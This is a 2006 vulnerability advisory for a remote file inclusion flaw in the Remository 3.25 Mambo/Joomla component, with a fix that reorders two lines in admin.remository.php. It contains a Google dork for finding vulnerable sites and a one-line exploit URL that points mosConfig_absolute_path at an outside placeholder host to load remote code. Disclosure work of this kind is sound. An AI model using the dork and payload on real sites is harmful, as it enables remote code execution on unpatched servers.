.:[ insecurity research team ]:.

.__..____.:.______.____.:.____ .

.:. |  |/    :/  ___// __ :/   _.:.

: |  |   |  \____\  ___/   /__ :. .

..: |__|___|  /____  >___  >___  >.:

.:.. ..  ./   .:/:.  ./.  .:/:

.   ...:.    .advisory.    .:...

:..................: o9.o8.2oo6 ..

Affected Application: Remository v3.25

(Mambo/Joomla CMS Component)

. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

Discoverd by: camino

Team: Insecurity Research Team

URL: http://www.insecurityresearch.org

E-Mail: camino (at) sexmagnet (dot) com [email concealed]

. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .

Typ: Remote [x]  Local [ ]

Remote File Inclusion [x]  SQL Injection [ ]

Level: Low [ ]  Middle [x]  High [ ]

Application: Remository

Version: 3.25

Vulnerable File: admin.remository.php

URL: http://www.remository.com

Description: It's a component that works with Mambo CMS 4.5+ to

provide a selection of files that users can download.

Dork: intext:"Remository 3.25. is technology by Black Sheep Research"

inurl:"com_remository"

. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

http://[sitepath]/[joomlapath]/administrator/components/

com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?

. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .

o1.) open admin.remository.php

o2.) take a look at line 16:

require_once ($mosConfig_absolute_path.'/components/

com_remository/com_remository_constants.php');

o3.) take a look at line 19:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location

is not allowed.' );

o4.) exchange line 19 with line 16!

. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .

brOmstar and all the sexy members of insecurity research team ;-)